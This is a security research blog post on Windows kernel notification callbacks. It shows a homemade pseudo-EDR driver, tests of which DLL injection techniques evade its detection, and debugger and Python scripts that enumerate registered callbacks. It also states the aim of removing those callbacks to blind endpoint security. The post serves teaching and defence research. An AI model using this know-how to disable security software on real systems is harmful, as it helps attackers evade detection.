内容简介:I won’t be sharing any 0day here (well, maybe a “nday” if you haven’t been looking intoMy experience with the Windows Kernel comes from writing exploits for memory corruption bugs. I’ve never worked at Microsoft or any other big hardware/AV company. I’m no
I won’t be sharing any 0day here (well, maybe a “nday” if you haven’t been looking into ring0
that much). The fact is, there’s not much public information about this subject (attacks against the Windows Kernel Ps callbacks). To play a little bit with these kernel callbacks, I “wrote” (yes, in commas) a pseudo- EDR proof-of-concept (that uses these Ps callbacks). This post tells the story of some of these ring0
experiments.
My experience with the Windows Kernel comes from writing exploits for memory corruption bugs. I’ve never worked at Microsoft or any other big hardware/AV company. I’m not a programmer, and I don’t have access to source code (besides the one that everyone has). So, my overall knowledge of the Windows kernel is limited. I found some bugs and wrote some ‘gangster’ kernel exploits, but that’s it.
What I’m trying to say is, the subject discussed here is presented in the interest of exploring the Windows kernel for self-education. I’ve tried to be as precise as possible (without being exhaustive), still is very likely that I made mistakes, I’m misinformed, or I forgot to mention something important. I apologise in advance. If you observe any mistakes/errors please let me know.
A while ago I looked at a commercial EDR solution from a low-level exploitation, and anti-tampering, perspective. I can’t disclose the name of the vendor, and I can’t talk about my findings. Don’t ask, I won’t even mention it again. However, that’s what revamped my interest in the Windows Kernel Ps Callback Functions. These callbacks are only used in drivers, and not in the kernel per si. Many Endpoint Security solutions (anti-virus, EDRs, HIDS/HIPS, etc) register these callbacks to monitor, and track, system activity. Kernel-mode Rootkits also make use of them, sometimes. Microsoft has been improving the capabilities of these callbacks (since Vista ), and software companies (like Endpoint Security Solutions vendors, and others) are shifting their hook based monitoring technology to these Kernel Notification Callbacks (plus the obvious Ob callbacks, Cm callbacks and mini-filter drivers, even though I won’t be talking about these in this post ).
Windows allows kernel drivers to register callback routines, which will then be called when a particular event occurs (like process/threads execution and termination, image loads, registry operations, and many others). When the event occurs the callback routine will be invoked, and the necessary action (as blocking it) can be taken.
You can find a comprehensive list of all the APIs exported by the Windows Kernel, for driver writes to register callback routines that are invoked by kernel components under various circumstances here . You can, and should, also look at the Windows Driver Kit (WDK) since they are well documented there. Note that there are still some others undocumented though.
While these Kernel Callbacks are mostly documented from a development perspective, I didn’t find much information regarding implementation weaknesses and offensive research focused on them. Initially, I mainly looked at PsSetCreateProcessNotifyRoutineEx and most of what I’m presenting here is around this process notification callback. However, it applies pretty much the same way to threads, Image loads, and Registry operations (as we’ll see).
Process notification callbacks are registered via PsSetCreateProcessNotifyRoutine , PsSetCreateProcessNotifyRoutineEx , and PsSetCreateProcessNotifyRoutineEx2 .
PsSetCreateProcessNotifyRoutineEx
is the same as the former but also allows you to block process creation, and PsSetCreateProcessNotifyRoutineEx2
is also invoked for Linux processes ( Windows Subsystem for Linux (WSL) ). We’ll ignore the last for now. These callbacks notify routine addresses are added to an array, the nt!PspCreateProcessNotifyRoutine
array. So whenever a process is being created (or terminated), the nt!PspCallProcessNotifyRoutines
iterates over this array and calls all the registered callbacks. And this is where you can start smiling. If you have done some Windows Kernel Exploitation, you know that once you have a primitive that allows you write into kernel memory the system is compromised. Even if you can write 1 byte only (more on this later).
Endpoint Security solutions (AVs, EDRs, Anti-Cheating Engines, etc), and others like Sysmon , Procmon , Process Explorer , and so on, they all make use of Kernel Callbacks. I “heard” that some AVs are still getting away with some forms of Kernel Hooking in 64-bit systems, relying on KPP bypasses. I won’t mention names. Anyway, all the few solutions I briefly looked at were using these Kernel Callbacks. There are some EDRs doing userland hooking but I won’t talk about those. That’s not in scope for this post. One thing I know, KPP is not available on 32-bit systems so it’s very likely that some AVs didn’t rewrite their engine for this platform. Anyway, no one cares about 32-bit anymore (including myself).
The problem here is that, as mentioned before, these callbacks are stored in an array. This means that if I can zero out that array somehow, they will stop working. If we can set callbacks, we can also delete them. Right? Well… “you need to be running code in ring zero for that” . True, but you know… since Administrator to Kernel is not a security boundary…
Apart from the pseudo-EDR kernel driver, I also wrote an Evil kernel driver that will somehow mess with our EDR (and eventually other software making use of these same callbacks). We’ll see how it can be (ab)used, and while here also talk a little bit about Kernel Patch Protection (KPP) , widely known as PatchGuard
, and Driver Signature Enforcement bypasses.
If you want to follow along with this post, I would recommend you to get two Windows 10 VMs. One (the debugger
/host) with a kernel debugger
, kd.exe
, from the Windows Debug Tools. If you feel like going crazy fancy use WinDbg Preview . Additionally, Visual Studio 2019 (the free version is enough) with the WDK , and the SDK . On the debuggee
/target, I would say that you’ll only need Process Hacker . That’s it, all the required software is available for free.
As a last note, before we begin, there’s another option for being notified when processes are created, or terminated. Event Tracing for Windows (ETW) . However, it is not possible to prevent a process from being created this way. Also, there’s a considerable delay regarding the notification delivery that makes this impractical depending on your “mission”. A short-lived process can exit before the notification arrives. We won’t talk about these here. The Windows Kernel Notification Callbacks are sent as “part of” process creation, and the driver cannot miss any process created and terminated quickly.
The EDR (Kernel Mode Driver)
Writing an EDR for fun, and potential profit, if you are willing to write a web interface
I wanted to play with these Windows Kernel Ps Callbacks. However, I didn’t have an EDR, or AV to play with. Well, AVs are cheap these days, I know. But the infosec buzzword at the moment is EDR. There are plenty, but none will give me access for free to their solution to play with it. So why not write my own?
If you never wrote a Windows Kernel Driver before, there’s this book, from Pavel Yosifovich , Windows Kernel Programming that I recommend you to grab a copy. This book kinda gives you all the foundations to write a driver using these Ps callbacks . Please note that it barely touches mini-filter drivers, but that’s not a surprise. You can pick one of his Kernel Mode Driver project’s and start building on top of it. That’s what I did for the EDR kernel driver, plus many other “features” I added myself. So, if you want to do the same, or learn about the subject, look at the book. If you already know a bit about Windows Kernel programming probably you’ll hate the book, if you don’t I believe you’ll like it and find it useful.
Moving forward, the pseudo “EDR” I wrote (at the moment) has the ability to:
- detect process creation and termination
- detect thread creation and termination
- detect Image loads
- block process creation based on the executable name
- detect DLL injection (kind of)
If you are willing to write a web interface, and you are looking for an idea to get your startup going, here it is. Grab the code, write the web interface, get some investors, slack for a year or two, sell the company, and pocket some millions (hopefully). Joking.
The code will be available on GitHub , one day. Be warned that I’m not a programmer, and I take zero responsibility for bugchecks . The focus of this post is not how to write a kernel driver. I’ll just show you how this pseudo-EDR works, you can eventually use it for your testing purposes. As of today, I didn’t bother testing the driver in multiple Windows versions. I only tested it on Windows 10 x64 1903 19H1 and a few other Windows versions. I might add support for other Windows versions but probably only for 64-bit systems. No one cares about 32-bit anymore. If you want it working on a 32-bit system it should be really easy to “fix it” though. I’ll probably do it myself at some point just for fun. Anyway, use Windows 10 x64 1903 19H1 as your target. Otherwise, there are zero guarantees that everything will work as presented here. It’s not my intention to write commercial grade rock-solid software, and honestly, this is just a PoC
and I couldn’t care less about supporting multiple Windows versions.
As you might know, or not know, to load an unsigned driver you need to enable test signing mode . I won’t go through the setup steps, these have been documented all over the Internet. A simple Google search is enough to get you going. You’ll also have to setup kernel debugging as mentioned before. Again, Google is your friend (and a close one, since it knows everything about you). Use it.
Once you enable test signing mode you’ll get a nice watermark on the bottom right corner of the screen, like the one below.
You’ll have to build the code yourself, fun! If you haven’t installed Windows Visual Studio 2019, and WDK, in this exact order, now is the time. After building the code you’ll end up with 3 files ( edr.sys
, alerts.exe
, and edrcli.exe
). I recommend you to build them with debug information for “better user experience”. Jokes aside, I added a lot of debugging information and that will help you understand better what’s going on.
Here’s the functionality of each one of the files.
- edr.sys (the pseudo-EDR kernel-mode driver)
- alerts.exe (the client that will let you get all the information from the kernel-mode driver)
- edrcli.exe (the client that lets you add process names that shouldn’t be allowed to start)
You can load the edr.sys
driver the same way you install a user-mode service. You can use the CreateService API, you can use OSR driver loader , you can use whatever you want. Or, you can just use the Windows built-in and most well known, tool for this. sc.exe
, which is what I use myself. There’s no need to install any extra tools, honestly.
We can install the driver as an Administrator
only. So open an elevated command prompt and type (assuming you have the driver in the Desktop
folder as I do, and change the username accordingly):
sc create edr type= kernel binPath= c:\users\rui\Desktop\edr.sys
Pay attention to the spaces. You should now have the following registry key HKLM\System\CurrentControlSet\Services\Edr
. We’ll eventually talk about it later. To start the driver type:
sc start edr
I hope you have a Kernel Debugger attached by now (and hopefully the machine didn’t bugcheck
), so you should see some messages with the Driver Prefix [EDR]
. You can also use DebugView from Sysinternals to see the debug messages, just make sure you enable the kernel debug messages. To avoid a lot of noise I still recommend you to just use kd.exe
) with the following KD
mask:
ed nt!Kd_Default_Mask 8
You can set Kd_default_mask
to f
to enable every possible debug message, although 8
should be enough to catch our unadorned KdPrint
(customized DbgPrint
). To revert it:
ed nt!Kd_Default_Mask 0x0
Note: if you are developing kernel-mode drivers I recommend you to automate everything as much as possible, but I’ll leave that as an exercise for you. This is just a messy demo with files all over the Desktop
folder.
Let’s get started. To register, and start, your EDR driver ( edr.sys
) use the commands mentioned above and once you get it loaded and running use the alerts.exe
to see what’s going on.
If you launch alerts.exe
without any parameter you’ll get all the notifications for processes, and threads, start and exit, plus Image loads as shown above. If you want a more granular view you can use the following command line switches.
Nothing fancy.
So, how does the kernel allows drivers to be notified of these specific events?
Process Notifications
As mentioned before, a driver can be notified when a process is created, or terminated, by registering a notification function with PsSetCreateProcessNotifyRoutine . Or, with PsSetCreateProcessNotifyRoutineEx , or PsSetCreateProcessNotifyRoutineEx2 .
The main API is PsSetCreateProcessNotifyRoutineEx , and that’s one we’ll be using in our pseudo-EDR driver. As we can read on MSDN, The PsSetCreateProcessNotifyRoutineEx routine registers or removes a callback routine that notifies the caller when a process is created or exits.
We can find its definition in the ntddk.h header file.
NTKERNELAPI NTSTATUS PsSetCreateProcessNotifyRoutineEx ( _In_ PCREATE_PROCESS_NOTIFY_ROUTINE_EX NotifyRoutine, _In_ BOOLEAN Remove );
The first parameter is a pointer to the PCREATE_PROCESS_NOTIFY_ROUTINE_EX routine to register or remove. The operating system calls this routine whenever a new process is created.
In our driver, this routine is called OnProcessNotify
and can be found on the Edr.cpp
file. We register it inside the DriverEntry
function, as shown below.
status = PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, FALSE); if (!NT_SUCCESS(status)) { KdPrint((DRIVER_PREFIX "failed to register process callback (0x%08X)\n", status)); break; }
Note: there’s a maximum limit of 64 callback registrations, which means the API call above can fail. This is a limitation that can be abused.
The second parameter, set to FALSE
above, is a Boolean value that specifies whether PsSetCreateProcessNotifyRoutineEx will add or remove a specified routine from the list of callback routines. If this parameter is TRUE, the specified routine is removed from the list of callback routines. If this parameter is FALSE, the specified routine is added to the list of callback routines. If Remove is TRUE, the system also waits for all in-flight callback routines to complete before returning.
Pretty simple.
The first argument, as shown above, has the following prototype (defined on the same header file).
typedef VOID (*PCREATE_PROCESS_NOTIFY_ROUTINE_EX) ( _Inout_ PEPROCESS Process, _In_ HANDLE ProcessId, _Inout_opt_ PPS_CREATE_NOTIFY_INFO CreateInfo );
And the data structure for process creation is defined on the same header file, as shown below.
typedef struct _PS_CREATE_NOTIFY_INFO { _In_ SIZE_T Size; union { _In_ ULONG Flags; struct { _In_ ULONG FileOpenNameAvailable : 1; _In_ ULONG IsSubsystemProcess : 1; _In_ ULONG Reserved : 30; }; }; _In_ HANDLE ParentProcessId; _In_ CLIENT_ID CreatingThreadId; _Inout_ struct _FILE_OBJECT *FileObject; _In_ PCUNICODE_STRING ImageFileName; _In_opt_ PCUNICODE_STRING CommandLine; _Inout_ NTSTATUS CreationStatus; } PS_CREATE_NOTIFY_INFO, *PPS_CREATE_NOTIFY_INFO;
An important field from the structure above is the CreationStatus
since this is the status that will be returned to the caller. In this pseudo-EDR driver, I added the ability to block processes from starting up using this field (by returning STATUS_ACCESS_DENIED
).
Blocking process creation
To configure which processes should be blocked, I wrote a small userland utility that communicates with the EDR driver. It allows you to add process names to a doubly-linked list ( LIST_ENTRY ) in the kernel where these process names are kept. Every time a new process starts, an in-line notification is sent to the EDR driver. The EDR driver looks at this doubly linked list and allows the process to start, or not.
This is just a proof-of-concept, so feel free to improve it. It just checks the process file name, so if you change it you bypass it. The point here is to simply make you think what are some of the limitations, or challenges that developers of this type of technology have to face. Like, where to keep this information? How to handle it? Are we going to keep a doubly linked list in the kernel with thousands of processes, command-line switches, and check it every time a new process starts? Should we use regular expressions? Parsing this in the kernel doesn’t sound like a good idea, right? Is this fine? Is this heavy? Should we use a database in user-mode? What’s the best approach to handle this? I guess you get the point.
Anyway, to add process names to this doubly linked list and block their execution you can use the edrcli.exe
client with the -i
switch.
Let’s say we want to block procexp64.exe
from starting.
After you add it to the doubly linked list mentioned above, here’s what happens.
You can add up to 10 process names, by default. This value is hardcoded, and you can change this in the code. Check the Edr.h
header file and change the define MAX_NR_PROC_TO_BLOCK
. Even better, would be to simply read this value from a registry key (feel free to write the code for this).
If this maximum cap is reached, the oldest one is deleted and the new one is added. See below the code responsible for this in the Edr.cpp
file.
if (g_Globals.NodeCount >= MAX_NR_PROC_TO_BLOCK) { KdPrint(("[EDR] Max # of process to block reached. Deleting the oldest one.\n")); auto tail = RemoveTailList(&g_Globals.ProcListHead); auto record = CONTAINING_RECORD(tail, FullItem<ProcessDenyInfo>, Entry); ExFreePool(record); g_Globals.NodeCount--; }
Anyway, if you add multiple processes and then try to get the list of the processes currently in the doubly linked list with the -l
switch you’ll get:
Yep, I didn’t finish this because I didn’t care. Maybe later. However, you can still see the contents of the doubly linked list if you have a kernel debugger attached.
Feel free to write the code that sends this data back to the user-mode client. I have multiple examples of how to do it in the Visual Studio
project. Anyway, how is this achieved? Inside our OnProcessNotify
function, we have the following.
if (CreateInfo) { if(!IsListEmpty(&g_Globals.ProcListHead)) { AutoLock<FastMutex> lock(g_Globals.ProcMutex); PLIST_ENTRY pENTRY = g_Globals.ProcListHead.Flink; while(pENTRY != &g_Globals.ProcListHead) { auto node = CONTAINING_RECORD(pENTRY, FullItem<ProcessDenyInfo>, Entry); auto pname = node->Data.ProcessName; KdPrint((DRIVER_PREFIX " -> %S\n", pname)); if (wcsstr(CreateInfo->ImageFileName->Buffer, pname)) { CreateInfo->CreationStatus = STATUS_ACCESS_DENIED; KdPrint((DRIVER_PREFIX "No Way Jose! Access to: \"%S\" is... Denied!!!\n", pname)); return; } pENTRY = pENTRY->Flink; } } (...)
As we can see from above, we have a mutex
that guarantees that the doubly linked listed, where we keep the list of the processes that we want to block, is not being manipulated. Then, we iterate over the list in the while
loop and if the process name matches we set the structure field mentioned above ( CreationStatus
) to STATUS_ACCESS_DENIED
. Simple. This shouldn’t be done with process names (but hashed values) for obvious reasons, but bear with me.
If you have a debugger attached you can also see the following debug message if there’s a match.
If you want to look at the code responsible to add a process name to the doubly linked list, you can look at the EdrDeviceControl
function, where the IOCTL_EDR_ADD_DENY_RULE
is handled (right below the code shown above). I’m simply using the LIST_ENTRY API calls to manage the doubly linked list.
DLL injection detection
The DLL injection detection mechanism I implemented in the kernel driver is very simple, actually basic. Still, it gives you an idea of how hard it can be to develop something without triggering many false positives. And, at the same time be able to cover all the possible DLL injection techniques there is. We aren’t even talking about code injection techniques, just DLL injection (which is only a subset of code injection).
Knowing that the first thread in a process is always remotely created, our heuristic is simple. If a process has more than one thread, and we see another remotely created thread we flag it as DLL injection (with the caveat described below). This is not bulletproof and while it works for the typical CreateRemoteThread it won’t work so well for a few more obscure techniques as we will see.
Again, the logic behind this detection is quite simple. However, believe it, or not, this method is used in multiple AV solutions. As we all know, a lot of “malware” injects code/threads into other/remote processes to avoid detection. The typical, and most basic scenario as referenced above is to use the WriteProcessMemory API to write data/shellcode to an area of memory in a specified process, and then call CreateRemoteThread . This is a very well documented technique, and there’s plenty of source code available online to do this. Windows itself uses it all the time. Anyway, I wrote a simple (and ugly) DLL injection tool a while ago that you can use for testing. It contains 7 different DLL injection techniques and can be found here .
Thread Notifications
The kernel also provides an API call for thread creation and termination, just like for process callbacks. The API is PsSetCreateThreadNotifyRoutine . To unregistering, this time, we have a second API call. PsRemoveCreateThreadNotifyRoutine . The parameters to the former are process ID, the thread ID, and a boolean value depending on the thread being created or terminated.
You can find all these definitions in the ntddk.h header file already mentioned.
typedef VOID (*PCREATE_THREAD_NOTIFY_ROUTINE)( _In_ HANDLE ProcessId, _In_ HANDLE ThreadId, _In_ BOOLEAN Create ); NTKERNELAPI NTSTATUS PsSetCreateThreadNotifyRoutine( _In_ PCREATE_THREAD_NOTIFY_ROUTINE NotifyRoutine ); NTKERNELAPI NTSTATUS PsRemoveCreateThreadNotifyRoutine ( _In_ PCREATE_THREAD_NOTIFY_ROUTINE NotifyRoutine );
In our pseudo-EDR driver we register our callback function ( OnThreadNotify
) as shown below in the DriverEntry
function:
status = PsSetCreateThreadNotifyRoutine(OnThreadNotify); if (!NT_SUCCESS(status)) { KdPrint((DRIVER_PREFIX "failed to set thread callback (status=%08X)\n", status)); break; }
So, to detect DLL injection, in our OnThreadNotify
function, that’s called in-line every time a thread is created/terminated, we can do something like this (pseudo-code):
void OnThreadNotify(HANDLE RemoteProcessId, HANDLE ThreadId, BOOLEAN Create) { currentProcess = GetCurrentProcess() if currentProcess not equal to RemoteProcessId THREAD INJECTION DETECTED
Quite simply, if the current process and the remote process are different it means the thread has been injected. This is not good enough because of what I mentioned before. In Windows, the first thread is always created remotely. So, in our OnThreadNotify
function, we use the PsLookupProcessByProcessId to obtain a referenced pointer to the EPROCESS structure of the process.
We are interested in the ActiveThreads
field of the EPROCESS
structure. This structure is not documented but we can look at it in a debugger. Here’s its definition on Windows 10 x64 1903 (OS Build 18362.592).
0: kd> dt nt!_EPROCESS nt!_EPROCESS +0x000 Pcb : _KPROCESS +0x2e0 ProcessLock : _EX_PUSH_LOCK +0x2e8 UniqueProcessId : Ptr64 Void +0x2f0 ActiveProcessLinks : _LIST_ENTRY (...) +0x448 ImageFilePointer : Ptr64 _FILE_OBJECT +0x450 ImageFileName : [15] UChar +0x45f PriorityClass : UChar (...) +0x488 ThreadListHead : _LIST_ENTRY +0x498 ActiveThreads : Uint4B <------------- +0x49c ImagePathHash : Uint4B (...) +0x878 MmHotPatchContext : Ptr64 Void
The code responsible for what’s described above is below.
Warning: there are hardcoded offsets all over the place, these will be fixed at some point.
status = PsLookupProcessByProcessId(ProcessId, &Process); if (!NT_SUCCESS(status)) { KdPrint(("PsLookupProcessByProcessId()\n")); return; } idProcess = PsGetCurrentProcessId(); idThread = PsGetCurrentThreadId(); if (HandleToULong(idProcess) == 4) //ignore the system process { return; } lpProcess = (LPTSTR)Process; lpProcess = (LPTSTR)(lpProcess + 0x450); // ImageFileName dt _EPROCESS if (idProcess != ProcessId) { PEPROCESS iProcess; LPTSTR lpProcessIn; status = PsLookupProcessByProcessId(idProcess, &iProcess); lpProcessIn = (LPTSTR)iProcess; lpProcessIn = (LPTSTR)(lpProcessIn + 0x450); // ImageFileName dt _EPROCESS LPTSTR ActiveThreads = (LPTSTR)(lpProcess + 0x48); // ActiveThreads dt _EPROCESS if((UINT32)*ActiveThreads > 1) // first thread is always created remotely KdPrint(("[EDR Thread Injection] Remote Process %d (%s) <thread %d> was injected by Process %d (%s) <thread %d> | Remote Process # Threads: %d\n", ProcessId, lpProcess, ThreadId, idProcess, lpProcessIn, idThread, (UINT32)*ActiveThreads)); }
Warning: As you can see from above, ImageFileName
is [15] UChar
so the process name if bigger that 16 is going to be truncated. It doesn’t matter, but if you are aiming for perfection use the field SeAuditProcessCreationInfo
.
For example:
0: kd> dt nt!_EPROCESS SeAuditProcessCreationInfo. ffff8882af0c2080 +0x468 SeAuditProcessCreationInfo : +0x000 ImageFileName : 0xffff8882`af8c3850 _OBJECT_NAME_INFORMATION 0: kd> dt _OBJECT_NAME_INFORMATION 0xffff8882`af8c3850 nt!_OBJECT_NAME_INFORMATION +0x000 Name : _UNICODE_STRING "\Device\HarddiskVolume3\Users\rui\Desktop\procexp64.exe"
Note that we ignore the SYSTEM
process because we aren’t interested in it, and Windows itself does DLL injection all the time.
We can quickly demo this with the DLL injection binaries I mentioned above. Please attach a kernel debugger to the target VM and don’t forget to enter the ed nt!Kd_Default_Mask 8
to see the debug messages. DLL injection is not blocked, simply logged and you won’t be able to see these being flagged without a kernel debugger attached. As a target process, we’ll be using notepad.exe
.
And we can see the following in our kernel debugger.
And if look at the notepad.exe
process with Process Hacker we can see that we have indeed 8 threads and we can easily identify what was the injected thread. Right?
If you aren’t familiar with how the CreateRemoteThread
DLL injection technique works I recommend you to read the injector
source code or thispost. Anyway, the remote thread we created executes LoadLibraryW and we can easily identify that thread (6316) with Process Hacker
and in the log message displayed in our debugger.
We can now try to play with the injectAllTheThings binary and see if “our” pseudo-EDR can detect other DLL injection techniques that don’t follow this usual pattern.
The first technique we already tried, let’s try the second one using NtCreateThreadEx . Even though this API is undocumented, the technique itself it’s still pretty much the same as the one we used above.
Still detected.
Let’s try the next one. This time using the QueueUserAPC API. Again, if you don’t know how these techniques work under the wood have a look at thispost.
This time, we didn’t get any “alert” in our kernel debugger. So, no detection. Hmm, stealthy DLL injection technique for the red teamers out there?
Let’s move to the next one using SetWindowsHookEx .
Again, no detection. If you don’t see the MessageBox please see the post I mentioned before describing how these techniques work. Anyway, another stealthy one for red teamers?
Let’s try the next one, RtlCreateUserThread .
This time, the DLL injection was detected (as expected).
Let’s try the next one, SetThreadContext .
As expected, not detected. Finally, let’s try the famous Reflective DLL injection technique by Stephen Fewer.
Detected again. Cool!
The results are not surprising if you played with this before. The idea of going through all the techniques was more to show you how you can use these small projects to help you test against some detection mechanisms employed by Endpoint Security products. I used injectAllTheThings.exe
multiple times to help me work around detections, I know at least two consultancy (red) teams that also use it regularly, and successfully. You now know that the technique used in the pseudo-EDR is not enough to detect certain techniques. You know what are its weaknesses. So start improving it!
As you can see it’s not an easy task to cover all possible code injection techniques from a detection point of view. We (well, not me) sometimes laugh at security products. However, in some cases (not always), if we start playing on the other side it’s not so funny.
Image Load Notifications
Any Endpoint Security software is heavily interested in Image loads. Every time a PE image ( EXE
, DLL
, SYS
, CPL
, …) file loads our pseudo-EDR will receive a notification. We can register for these notifications by using the API call PsSetLoadImageNotifyRoutine . To stop receiving them, we can unregister by using the API call PsRemoveLoadImageNotifyRoutine .
We can find its definition in the ntddk.h file:
typedef VOID (*PLOAD_IMAGE_NOTIFY_ROUTINE)( _In_opt_ PUNICODE_STRING FullImageName, _In_ HANDLE ProcessId, // pid into which image is being mapped _In_ PIMAGE_INFO ImageInfo );
In our driver, we register for image load notifications in the DriverEntry
function.
status = PsSetLoadImageNotifyRoutine(OnImageLoadNotify); if (!NT_SUCCESS(status)) { KdPrint((DRIVER_PREFIX "failed to set image load callback (status=%08X)\n", status)); break; }
However, we don’t do “anything” in the OnImageLoadNotify
function. However, there’s an interesting gotcha worth mentioning. The FullImageName
argument you can see above is optional as noted by the SAL annotation . This means it can be NULL
and it doesn’t always produce the correct image file name. Microsoft is aware of this issue , and this issue can allegedly be abused to bypass some Security systems. There are two really interesting posts about the root cause of this issue from Ensilo, here and here . There’s another different issue with this callback, that I might talk about in a different post.
Kernel Notify Callbacks Enumeration
As mentioned before, if we can set these callbacks… we can also remove them. If the callback is set by our driver it’s trivial to unset it. However, if we want to enumerate all the callbacks that exist on the system extra work is required.
We can use some kd
scripting kung-fu and enumerate all the callbacks registered in the system easily.
KD (WinDbg) script
To look at the callbacks registered in the system we can use some debugging and automation scripts.
You can use the kd
script below to list Process, Threads, and Image load callbacks. It’s not very robust in terms of error handling at the moment. Feel free to improve it. There are no dependencies, just some quick scripting with the Debugging Tools.
$$ displays a list of all registered process/thread creation and image load callbacks $$ $$><C:\Users\rui\Desktop\windbg-scripts\psnotifycallbacks.wdb r $t0 = dwo(nt!PspCreateProcessNotifyRoutineExCount) r $t1 = dwo(nt!PspCreateProcessNotifyRoutineCount) r $t3 = nt!PspCreateProcessNotifyRoutine aS ${Total} (@$t0 + @$t1) .block { .printf "[+] Total of: %u CreateProcessNotifyRoutines\n", ${Total} .for (r $t4 = 0 ; $t4 < ${Total} ; r $t4 = @$t4 + 1) { r $t5 = poi(@$t3 + (@$ptrsize * @$t4)) r $t5 = @@C++(@$t5 & (~0xf)) r $t6 = (@$t5 + @$ptrsize) .printf "[%u] %y\n", @$t4, poi(@$t6) } } ad /q _sr_${Total}; r $t0 = dwo(nt!PspCreateThreadNotifyRoutineCount) r $t1 = nt!PspCreateThreadNotifyRoutine aS ${Total} @$t0 .block { .printf "\n[+] Total of: %u CreateThreadNotifyRoutines\n", ${Total} .for (r $t4 = 0 ; $t4 < ${Total} ; r $t4 = @$t4 + 1) { r $t5 = poi(@$t1 + (@$ptrsize * @$t4)) r $t5 = @@C++(@$t5 & (~0xf)) r $t6 = (@$t5 + @$ptrsize) .printf "[%u] %y\n", @$t4, poi(@$t6) } } ad /q _sr_${Total}; r $t0 = dwo(nt!PspLoadImageNotifyRoutineCount) r $t1 = nt!PspLoadImageNotifyRoutine aS ${Total} (@$t0) .block { .printf "\n[+] Total of: %u CreateLoadImageRoutines\n", ${Total} .for (r $t4 = 0 ; $t4 < ${Total} ; r $t4 = @$t4 + 1) { r $t5 = poi(@$t1 + (@$ptrsize * @$t4)) r $t5 = @@C++(@$t5 & (~0xf)) r $t6 = (@$t5 + @$ptrsize) .printf "[%u] %y\n", @$t4, poi(@$t6) } } ad /q _sr_${Total}; ad /q *;
In case you aren’t familiar with Windows debugging scripting, here’s a brief description about what’s going on. As mentioned before, when a driver registers a process callback, the pointer to the callback is stored in an internal data structure. More precisely, an array of pointers (to those data structures). This is maintained in a global variable named nt!PspCreateProcessNotifyRoutine
. Yes, global variable!
Depending on the API, and Windows version, that was used to register the process callbacks, either one of the 2 counters is used:
nt!PspCreateProcessNotifyRoutineExCount nt!PspCreateProcessNotifyRoutineCount
These counters are incremented when a new callback is registered in the system.
The same happens for threads, and every time an image is (un)loaded. So, we calculate the total number of callbacks and then iterate through the array of pointers to get the respective structures to display the symbol associated with the callback function pointer. If you aren’t getting symbols try using .reload
before running the script.
The $t0
to $t6
are the debugger temporary registers and are used as variables. The r
is used when we use them for the first time on a new line of the script. dwo
is a Masm
operator used to read the DWORD
of 32 bits values. With aS
we are setting an alias count to the sum of the registers $t0
and $t1
.
.printf
, as I bet you can guess, is a control flow token and part of the debugging scripting language which can be used to format and display values from the debugger script.
Probably you can also guess what .for
is. Correct, another control flow token. poi
is a MASM
operator similar to dwo
but it is used to reference pointer size values.
@$ptrsize
is a pseudo register that is automatically set to 4, or 8, depending on the target system being debugged (a 32 or 64-bit system respectively).
For the debugger to process the &
and ~
operators, both part of the C++
language, we have to switch to the C++
expression evaluator using @@C++
. With ad ${/v:Count}
we delete the alias count so it doesn’t interfere with the subsequent executions of the script.
Finally, to run the external script in the debugger:
$$><c:\path\to\script.wdb
Here’s the output of the execution of the script above in my system.
We can see all the notification callback routines registered by our pseudo-EDR driver. You might recognize some, and if you looked at these before you might even notice that one that’s usually here… is missing. Yes, I disabled Windows Defender in this system, so the WdFilter.sys
is missing. Good catch!
Python script
While the above is enough, because I like Python, based on this triplefault.io post I “hacked” the following Python script with Pykd that you can use to enumerate Process, Threads, and Image Load callbacks as well.
from pykd import * version = getSystemVersion() def ptr_size(): if is64bitSystem(): return 8 else: return 4 def checkKernelDebugging(): if not isKernelDebugging() and not isLocalKernelDebuggerEnabled(): print("[-] Not running inside KD!") exit(1) # load required module 'nt' def loadNT(): try: nt = module("nt") except: print("[-] Couldn't not get the base address of 'ntoskrnl'.") exit(1) return nt def fastref(_EX_FAST_REF): # discard last 4 bits of the pointer return ((_EX_FAST_REF >> 4) << 4) def listCallbacks(CallbacksArray, ArraySize): PSIZE = ptr_size() for i in range(ArraySize): callback = (CallbacksArray + (i * PSIZE)) try: callback = ptrPtr(callback) except: print i print ArraySize print("[-] Couldn't read memory!!") exit(1) if callback == 0: continue obj = fastref(callback) try: apicall = ptrPtr(obj + (PSIZE)) except: print("[-] Couldn't read memory!") exit(1) print("[{}] {:#x} ({})".format(i, apicall, findSymbol(apicall))) def processCallbacks(nt): try: # read counters PspCreateProcessNotifyRoutineExCount = ptrDWord(nt.offset("PspCreateProcessNotifyRoutineExCount")) PspCreateProcessNotifyRoutineCount = ptrDWord(nt.offset("PspCreateProcessNotifyRoutineCount")) # get the address of the symbol PspCreateProcessNotifyRoutine PspCreateProcessNotifyRoutine = nt.offset("PspCreateProcessNotifyRoutine") except: print("[-] Couldn't not read memory and/or load Symbols") exit(1) # if <= Windows 2003 https://www.gaijin.at/en/infos/windows-version-numbers if version.buildNumber <= 3790: num = PspCreateProcessNotifyRoutineCount else: num = PspCreateProcessNotifyRoutineExCount + PspCreateProcessNotifyRoutineCount print("[+] Total of: {} CreateProcessNotifyRoutines".format(num)) listCallbacks(PspCreateProcessNotifyRoutine, num) def threadCallbacks(nt): try: # counter PspCreateThreadNotifyRoutineCount = ptrDWord(nt.offset("PspCreateThreadNotifyRoutineCount")) # get the address of the symbol PspCreateThreadNotifyRoutine PspCreateThreadNotifyRoutine = nt.offset("PspCreateThreadNotifyRoutine") except: print("[-] Couldn't not read memory and/or load Symbols") exit(1) if version.buildNumber >= 10240: num = PspCreateThreadNotifyRoutineCount + ptrDWord(nt.offset("PspCreateThreadNotifyRoutineNonSystemCount")) else: num = PspCreateThreadNotifyRoutineCount print("\n[+] Total of: {} CreateThreadNotifyRoutines".format(num)) listCallbacks(PspCreateThreadNotifyRoutine, num) def loadimageCallbacks(nt): try: # read counters PspLoadImageNotifyRoutineCount = ptrDWord(nt.offset("PspLoadImageNotifyRoutineCount")) # get the address of the symbol PspLoadImageNotifyRoutine PspLoadImageNotifyRoutine = nt.offset("PspLoadImageNotifyRoutine") except: print("[-] Couldn't not read memory and/or load Symbols") exit(1) num = PspLoadImageNotifyRoutineCount print("\n[+] Total of: {} CreateLoadImageRoutines".format(num)) listCallbacks(PspLoadImageNotifyRoutine, num) if __name__ == '__main__': checkKernelDebugging() nt = loadNT() processCallbacks(nt) threadCallbacks(nt) loadimageCallbacks(nt)
To run it:
